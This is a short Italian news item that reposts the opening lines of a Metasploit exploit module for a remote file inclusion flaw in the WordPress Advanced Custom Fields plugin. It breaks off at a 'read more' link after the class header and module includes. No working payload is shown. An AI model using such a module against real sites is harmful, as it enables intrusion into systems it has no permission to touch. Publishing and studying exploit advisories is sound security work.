WordPress Advanced Custom Fields Remote File Inclusion

3 gennaio 2013 - Fonte: http://www.mondounix.com
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude
  def initialize(info = {})
      'Name'           => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
      'Description'    => %q{
          This module exploits a remote file inclusion flaw in the WordPress blogging

Leggi il seguito »